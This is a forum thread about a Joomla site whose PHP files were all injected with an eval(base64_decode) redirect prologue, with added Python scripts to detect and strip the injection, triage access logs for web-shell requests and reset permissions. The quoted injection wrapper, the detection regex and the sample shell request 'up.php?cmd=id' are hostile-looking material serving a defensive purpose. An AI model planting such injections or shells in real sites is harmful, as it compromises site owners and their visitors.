
SOLVED Virus!! how did they do it?

    • Andrew Boyce's Avatar
    • Andrew Boyce
    • Sr. Rocketeer
    • Posts: 237
    • Thanks: 0
    • Systems Engineer

    SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • I found that one of my Joomla websites had a virus. It was redirecting all visitors to another website that would then infect the PC with a virus.

      After investigating I found that all the PHP files on the site had this code inserted into the beginning of the file:

      <?php /**/ eval(base64_decode("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"));?><?php

      How do they do this and, more importantly, how do I stop it?

      I am using Joomla version 15.22
    • Last Edit: 12 years 11 months ago by Andrew Boyce.
    • There are only 10 types of people. those that understand binary and those that do not.
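    The line quoted above is only a wrapper: base64_decode() unpacks a string and eval() runs it, so the injected PHP never appears in the file in readable form. What follows is an added example (not from the original post, and not Joomla's or GuardXT's code) of how to triage that across a web root without executing anything: match the prologue at offset 0 of each .php file, decode the payload so it can be read, and strip it while keeping a copy of the infected file. The sample web root and SAMPLE_PAYLOAD are constructed for the example; the real payload shown in the post is not reproduced.

```python
"""Added example: find, decode and strip the eval(base64_decode("...")) prologue
described in the post.  Sample tree and payload are constructed, not real."""
import base64
import binascii
import os
import re
import sys
import tempfile

# The injected prologue as the post describes it: opening tag, an empty
# comment, eval(base64_decode("<base64>")) and a closing tag, glued to the
# front of the file's genuine <?php tag.  Anchored at offset 0 on purpose:
# a match anywhere else deserves a manual look, not an automatic strip.
INJECT_RE = re.compile(
    rb'^<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>'
)

def find_injection(data: bytes):
    """Return (decoded_payload, remaining_source) or None if data is clean.

    The payload is decoded, never evaluated: reading the decoded PHP is how
    you learn what the redirect does and whether it persists elsewhere."""
    m = INJECT_RE.match(data)
    if m is None:
        return None
    try:
        payload = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        payload = b"<undecodable> " + m.group(1)
    return payload, data[m.end():]

def scan_tree(root):
    """Map path -> decoded payload for every infected .php file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                found = find_injection(fh.read())
            if found is not None:
                hits[path] = found[0]
    return hits

def clean_tree(root):
    """Strip the prologue from each infected file, keeping the original as
    <name>.infected for the investigation.  Returns the number cleaned."""
    cleaned = 0
    for path in sorted(scan_tree(root)):
        with open(path, "rb") as fh:
            data = fh.read()
        _payload, rest = find_injection(data)
        os.replace(path, path + ".infected")   # evidence, and no longer .php
        with open(path, "wb") as fh:
            fh.write(rest)
        cleaned += 1
    return cleaned

# Constructed stand-in payload; the page's real payload is not reproduced.
SAMPLE_PAYLOAD = b'echo "constructed stand-in, not the real redirect";'

def make_sample_tree():
    """Build a throwaway web root with one infected and one clean file."""
    root = tempfile.mkdtemp(prefix="joomla-sample-")
    os.makedirs(os.path.join(root, "components"))
    wrapper = (b'<?php /**/ eval(base64_decode("'
               + base64.b64encode(SAMPLE_PAYLOAD) + b'"));?>')
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(wrapper + b'<?php\n// genuine site code\n')
    with open(os.path.join(root, "components", "clean.php"), "wb") as fh:
        fh.write(b'<?php\n// untouched file\n')
    return root

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()
    for path, payload in scan_tree(root).items():
        print(path, "->", payload[:80])
    print("cleaned:", clean_tree(root))
```

    Stripping the prologue removes the redirect, not the foothold that wrote it: the decoded payload and the server logs tell you what else was touched, which is why clean_tree keeps the .infected copies rather than overwriting in place. Restoring from a known-clean backup, as the thread goes on to do, is still the safer end state.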
    • prim's Avatar
    • prim
    • Preeminent Rocketeer
    • Posts: 17290
    • Thanks: 217

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • Hard to say without having full access to the site/FTP.

      You can read a bit more about the code here: php.net/manual/en/function.base64-decode.php
    • Please reply with a direct link to the issue & create a new thread for each new issue.

      A template is only as good as the content that goes into it ;) - DanG
    • Andrew Boyce's Avatar
    • Andrew Boyce
    • Sr. Rocketeer
    • Posts: 237
    • Thanks: 0
    • Systems Engineer

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • The site is down at the moment as I am restoring the PHP files from backup, but damn, every PHP file on the entire site is infected with the code above. I am looking for ways to prevent it in future.
    • There are only 10 types of people. those that understand binary and those that do not.
    • Smejus57's Avatar
    • Smejus57
    • Sr. Rocketeer
    • Posts: 151
    • Thanks: 0

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • After you restore, shouldn't you upgrade to the newest version of 1.5 (which is 1.5.3) as well?
    • Andrew Boyce's Avatar
    • Andrew Boyce
    • Sr. Rocketeer
    • Posts: 237
    • Thanks: 0
    • Systems Engineer

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • Done... thank you but I do not think this would help with this exact problem.
    • There are only 10 types of people. those that understand binary and those that do not.
    • prim's Avatar
    • prim
    • Preeminent Rocketeer
    • Posts: 17290
    • Thanks: 217

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • 1. rockettheme.com/quicklinks/security/36-v...urity-specific-links
      2. Change all usernames/passwords if you can and make them long and random.
      3. You should use Akeeba Backup in the future. It will save you a lot of time.
    • Please reply with a direct link to the issue & create a new thread for each new issue.

      A template is only as good as the content that goes into it ;) - DanG
    • Andrew Boyce's Avatar
    • Andrew Boyce
    • Sr. Rocketeer
    • Posts: 237
    • Thanks: 0
    • Systems Engineer

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • I do, but I have it run nightly, and the backup from last night has the virus. Fortunately I have an older one and was able to restore it.

      I am using GuardXT now. Just installed it; cool product, you should check it out: www.joomlaxt.com/index.php?option=com_re...31&func=select&id=12
    • There are only 10 types of people. those that understand binary and those that do not.
    • Smejus57's Avatar
    • Smejus57
    • Sr. Rocketeer
    • Posts: 151
    • Thanks: 0

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • I never meant for my post to imply that upgrading to the most recent version of Joomla! would solve the current problems, but running an out-of-date Joomla! version only leaves you open to attacks.

      Good luck getting your issues solved!!
    • edfel's Avatar
    • edfel
    • Elite Rocketeer
    • Posts: 584
    • Thanks: 0

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • Hi there:

      Try checking the web server log files. It is a must for you to determine the point of entry in order to block the hole. I also recommend using a Joomla firewall extension. I use Defender and it has worked wonders.

      There are many articles regarding hardening your web server.

      Two tools that have worked for me:

      APF firewall
      BFT (detects and blocks excessive unauthorized login attempts)

      However, please note that you must feel confident in your skills, as you can lock yourself out. Many security actions depend on the platform you are using (Windows, Linux).

      Hope you can restore and block the intruders away.

    • Apache 2.4.23 | PHP 7.0.10 | MySQL 5.5.50 | RHEL 6.8
      Joomla 3.6.2
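    The log check recommended above is the step that turns "every file was rewritten" into "this request wrote them". As an added example (not from the post, and not part of Defender, APF or any Joomla extension), the script below triages Apache combined-format access-log lines for the two things a mass PHP injection usually leaves behind: PHP being served from a directory the web user can write to, and a .php path outside the stock entry points answering with a 2xx. The log lines, IP addresses, paths and the WRITABLE_DIRS and KNOWN_ENTRY_POINTS lists are constructed or assumed for the example; extend the lists with whatever your own extensions genuinely expose.

```python
"""Added example: triage Apache access-log lines for the entry point of a
PHP-file injection.  Log lines and directory lists are constructed/assumed."""
import re
from collections import Counter

# Apache "combined" format up to the status and size fields.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Directories a Joomla 1.5 site needs the web server to write to, and which
# therefore must never be allowed to serve PHP (assumed list).
WRITABLE_DIRS = ("/images/", "/tmp/", "/cache/", "/logs/", "/media/")

# PHP entry points of a stock Joomla 1.5 install (assumed list).
KNOWN_ENTRY_POINTS = {
    "/index.php", "/index2.php", "/administrator/index.php",
    "/administrator/index2.php", "/xmlrpc/index.php",
}

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec["target"].split("?", 1)[0]   # drop the query string
    return rec

def triage(lines):
    """Return (suspicious_records, hits_per_ip).

    A record is suspicious when PHP is requested from a writable directory
    (an uploaded shell), or when a .php path outside the known entry points
    answered with 2xx (a dropped script that actually exists and ran)."""
    suspicious = []
    per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith(".php"):
            continue
        reasons = []
        if any(d in rec["path"] for d in WRITABLE_DIRS):
            reasons.append("php served from writable dir")
        if rec["path"] not in KNOWN_ENTRY_POINTS and rec["status"].startswith("2"):
            reasons.append("unknown php file answered 2xx")
        if reasons:
            rec["reasons"] = reasons
            suspicious.append(rec)
            per_ip[rec["ip"]] += 1
    return suspicious, per_ip

# Constructed sample log: normal traffic from one address, then an upload
# directory being used to run PHP from another.  com_foo is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2010:03:12:07 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2010:03:12:09 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Nov/2010:03:40:11 +0000] "POST /images/stories/up.php HTTP/1.1" 200 13 "-" "-"
198.51.100.23 - - [10/Nov/2010:03:40:15 +0000] "GET /images/stories/up.php?cmd=id HTTP/1.1" 200 57 "-" "-"
198.51.100.23 - - [10/Nov/2010:03:41:02 +0000] "GET /components/com_foo/helper.php HTTP/1.1" 404 210 "-" "-"
198.51.100.23 - - [10/Nov/2010:03:41:20 +0000] "POST /tmp/x.php HTTP/1.1" 200 0 "-" "-"
""".splitlines()

if __name__ == "__main__":
    hits, per_ip = triage(SAMPLE_LOG)
    for rec in hits:
        print(rec["when"], rec["ip"], rec["method"], rec["target"], rec["reasons"])
    print("per IP:", dict(per_ip))
```

    Run it against the real access log with the timestamps narrowed to the window in which the .php files' mtimes changed; the first suspicious request before that window is the one to explain. Note that the 404 for the unknown path is deliberately ignored: a scanner probing for files that do not exist is noise, a 200 for a file that should not exist is the finding.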
    • Andrew Boyce's Avatar
    • Andrew Boyce
    • Sr. Rocketeer
    • Posts: 237
    • Thanks: 0
    • Systems Engineer

    Re: SOLVED Virus!! how did they do it?

    Posted 13 years 11 months ago
    • Thanks, everyone..
      I have restored the site and so far it looks safe. I realized I had not implemented the .htaccess file on this website and have done so.

      My web server is an Ubuntu server with LAMP and I have approximately 100 Joomla websites on it, and the only one that was infected, so far as I can tell, was this one. But like I said, the .htaccess file was not set on this site and the files and directories were set to full access; I have changed this as well.

      I will check out the APF firewall and BTF and report back my findings, etc.

      Thanks again
    • There are only 10 types of people. those that understand binary and those that do not.
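    The "full access" permissions mentioned above are the detail that lets one compromised site rewrite every one of its own files. As an added example (not from the post, and not a Joomla tool), the script below audits a web root for world-writable entries, resets directories to 0755 and files to 0644 (configuration.php to 0444, an assumed convention), and lists what the current user owns, which is the check to repeat across the other 99 sites. The sample tree is constructed in a temporary directory.

```python
"""Added example: audit and reset permissions on a Joomla web root the way
the post describes.  The sample tree is constructed, not a real site."""
import os
import stat
import tempfile

def world_writable(root):
    """Sorted list of paths under root with the other-write bit set."""
    found = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            if os.lstat(path).st_mode & stat.S_IWOTH:
                found.append(path)
    return sorted(found)

def owned_by(root, uid=None):
    """Paths under root owned by uid (default: the current user).  Run this
    with the web server's uid: anything it owns it can rewrite regardless of
    a 644 mode, so site files should belong to a separate account."""
    if uid is None:
        uid = os.getuid()
    found = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            if os.lstat(path).st_uid == uid:
                found.append(path)
    return sorted(found)

def harden(root):
    """Set dirs to 0755 and files to 0644 (configuration.php to 0444, an
    assumed convention).  Symlinks are skipped.  Returns (dirs, files) changed."""
    dirs_changed = files_changed = 0
    os.chmod(root, 0o755)
    for dirpath, dirs, files in os.walk(root):
        for name in dirs:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            if stat.S_IMODE(os.stat(path).st_mode) != 0o755:
                os.chmod(path, 0o755)
                dirs_changed += 1
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            want = 0o444 if name == "configuration.php" else 0o644
            if stat.S_IMODE(os.stat(path).st_mode) != want:
                os.chmod(path, want)
                files_changed += 1
    return dirs_changed, files_changed

def make_sample_tree():
    """Constructed web root with everything set to 'full access', as in the post."""
    root = tempfile.mkdtemp(prefix="joomla-perms-")
    for d in ("images", "cache", "components"):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), 0o777)
    for f in ("index.php", "configuration.php", "images/x.php"):
        path = os.path.join(root, f)
        with open(path, "w") as fh:
            fh.write("<?php\n")
        os.chmod(path, 0o666)
    return root

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()
    print("world-writable before:", len(world_writable(root)))
    print("changed (dirs, files):", harden(root))
    print("world-writable after:", len(world_writable(root)))
```

    Directories Joomla must write to (cache, tmp, logs, images) should get that ability through group ownership for the web server's account, not through o+w, and PHP execution should be disabled in those directories in the web server configuration; mode bits alone do not stop the web server from rewriting files it owns.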
